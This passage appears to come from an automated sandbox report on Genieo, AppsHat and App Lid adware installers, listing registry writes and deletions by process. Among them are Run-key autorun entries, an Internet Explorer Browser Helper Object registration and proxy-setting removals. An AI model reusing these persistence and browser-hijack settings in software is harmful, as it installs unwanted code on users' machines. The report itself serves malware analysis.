[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process genieo_setup.gen:3380 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Genieo]
"supported_langs" = ";en;"
[HKCU\Software\Genieo\Components\Partner]
"default_partner_version" = "1.0.400"
"active_partner" = "gim394750002"
"default_partner" = "genieo"
"install_monetizer_url" = ""
[HKCU\Software\Genieo]
"client_localization" = "en"
The process cmdshell.exe:3084 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "3B D2 61 E8 8E 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 46 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "0F FF FA EB 8E 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process genieo_setup.exe:1552 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Genieo]
"supported_langs" = ";en;"
[HKCU\Software\Genieo\Components\Partner]
"default_partner_version" = "1.0.400"
"active_partner" = "gim394750002"
"default_partner" = "genieo"
"install_monetizer_url" = ""
"installed_partner" = "gim394750002"
[HKCU\Software\Genieo]
"client_localization" = "en"
The process WebPlayer.exe:2984 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\WebPlayer\AppsHat]
"start-on-windows" = "true"
"Version" = "2.13"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionTime" = "41 6E E2 F0 8E 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 4B 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\WebPlayer\AppsHat]
"Config" = "{""group-name"":""AppsHat""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\WebPlayer\AppsHat]
"last_config_request" = "Thu Jan 29 08:44:20 UTC 0200 2015"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionTime" = "1A 3B 37 04 8F 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
[HKCU\Software\WebPlayer\AppsHat]
"first_run_complete" = "true"
To automatically run itself each time Windows is booted, the Application adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"AppsHat" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process STab_Down_6.0.6.6.exe:3216 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "E0 D1 59 A4 8E 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadNetworkName" = "Network"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecisionReason" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDecision" = "0"
"WpadDecisionTime" = "86 83 0B D9 8E 3B D0 01"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{EE1E4E39-627C-4D52-9D86-A515AB38A003}]
"WpadDetectedUrl"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDetectedUrl"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process App Lid-codedownloader.exe:3672 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "41 6E E2 F0 8E 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 48 00 00 00 09 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process App Lid-codedownloader.exe:3264 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies]
"CachePrefix" = "Cookie:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecision" = "0"
"WpadDecisionTime" = "41 6E E2 F0 8E 3B D0 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-ef-0d-5d]
"WpadDecisionReason" = "1"
"WpadDetectedUrl" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 49 00 00 00 09 00 00 00 00 00 00 00"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Application deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoDetect"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
The process regsvr32.exe:3720 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho64.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\ProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1"
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho64.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories]
"(Default)" = ""
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622572243}"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622572243}"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\VersionIndependentProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO\CurVer]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\ProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611571143}"
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}]
"(Default)" = "App Lid"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox\CurVer]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644574443}\1.0\0\win64]
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho64.dll"
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611571143}"
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\VersionIndependentProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611571143}]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"
"NoExplorer" = "1"
The Application deletes the following registry key(s):
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\ProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\VersionIndependentProgID]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\InprocServer32]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\ProgID]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\Programmable]
[HKCR\CLSID\{22222222-2222-2222-2222-220622572243}\TypeLib]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611571143}]
[HKCR\CLSID\{11111111-1111-1111-1111-110611571143}\Programmable]
The process regsvr32.exe:3404 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCR\Interface\{66666666-6666-6666-6666-660666576643}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611571143}]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"
[HKCR\Wow6432Node\Interface\{66666666-6666-6666-6666-660666576643}]
"(Default)" = "ISandBox"
[HKCR\Interface\{66666666-6666-6666-6666-660666576643}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\VersionIndependentProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\InprocServer32]
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho.dll"
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611571143}]
"NoExplorer" = "1"
[HKCR\Interface\{55555555-5555-5555-5555-550655575543}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\Interface\{66666666-6666-6666-6666-660666576643}\TypeLib]
"Version" = "1.0"
[HKCR\Wow6432Node\Interface\{55555555-5555-5555-5555-550655575543}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"
[HKCR\Interface\{66666666-6666-6666-6666-660666576643}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"
[HKCR\Wow6432Node\Interface\{55555555-5555-5555-5555-550655575543}]
"(Default)" = "ICrossriderBHO"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622572243}"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"
[HKCR\Wow6432Node\Interface\{55555555-5555-5555-5555-550655575543}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}]
"(Default)" = "App Lid"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644574443}\1.0\0\win32]
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho.dll"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644574443}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Wow6432Node\Interface\{55555555-5555-5555-5555-550655575543}\TypeLib]
"Version" = "1.0"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO\CurVer]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
"(Default)" = "%Program Files% (x86)\App Lid\App Lid-bho.dll"
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\VersionIndependentProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\ProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"
[HKCR\Interface\{55555555-5555-5555-5555-550655575543}]
"(Default)" = "ICrossriderBHO"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO.1\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611571143}"
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
"(Default)" = ""
[HKCR\TypeLib\{44444444-4444-4444-4444-440644574443}\1.0]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743 Type Library"
[HKCR\Interface\{66666666-6666-6666-6666-660666576643}]
"(Default)" = "ISandBox"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1\CLSID]
"(Default)" = "{22222222-2222-2222-2222-220622572243}"
[HKCR\Interface\{55555555-5555-5555-5555-550655575543}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{44444444-4444-4444-4444-440644574443}\1.0\HELPDIR]
"(Default)" = "%Program Files% (x86)\App Lid"
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\ProgID]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox.1"
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories]
"(Default)" = ""
[HKCR\Wow6432Node\Interface\{66666666-6666-6666-6666-660666576643}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Wow6432Node\Interface\{66666666-6666-6666-6666-660666576643}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox\CurVer]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\TypeLib]
"(Default)" = "{44444444-4444-4444-4444-440644574443}"
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{55555555-5555-5555-5555-550655575543}\TypeLib]
"Version" = "1.0"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox]
"(Default)" = "722d4692059d4f6e9e4fe6c89dbafe3b0065743.Sandbox"
[HKCR\722d4692059d4f6e9e4fe6c89dbafe3b0065743.BHO\CLSID]
"(Default)" = "{11111111-1111-1111-1111-110611571143}"
The Application deletes the following registry key(s):
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\InprocServer32]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\Programmable]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\TypeLib]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\InprocServer32]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\ProgID]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\TypeLib]
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{11111111-1111-1111-1111-110611571143}]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\Programmable]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\Implemented Categories\{59fb2056-d625-48d0-a944-1a85b5ab2640}]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\VersionIndependentProgID]
[HKCR\Wow6432Node\CLSID\{22222222-2222-2222-2222-220622572243}\VersionIndependentProgID]
[HKCR\Wow6432Node\CLSID\{11111111-1111-1111-1111-110611571143}\ProgID]
The process framework_setup.gen:1048 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Genieo\Components\Framework\Personalization Framework]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine"
[HKCU\Software\Genieo\Components\Framework\Personalization Framework\Components]
"Main" = "1"
The Application deletes the following value(s) in system registry:
The Application disables automatic startup of the application by deleting the following autorun value:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GenieoPlatform"
The process InstallGenieo.exe:4052 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Genieo]
"updater_status" = "/status?day=0&partner=gim394750002"
[HKCU\Software\Genieo\Components\Updater\Genieo\Components]
"LastUpdateTime" = "2015 01 29 08 44"
[HKCU\Software\Genieo\Components\Partner]
"Main" = "1"
[HKCU\Software\Genieo]
"DisableUI" = "43"
The process InstallGenieo.exe:1660 makes changes in the system registry.
The Application creates and/or sets the following values in system registry:
[HKCU\Software\Genieo\Components\Updater\Genieo]
"Path" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater"
[HKCU\Software\Genieo\Components\Updater\Genieo\ComponentsInstallTime]
"trayapp_dl" = "60"
"ieplugins_inst" = "10"
[HKCU\Software\Genieo]
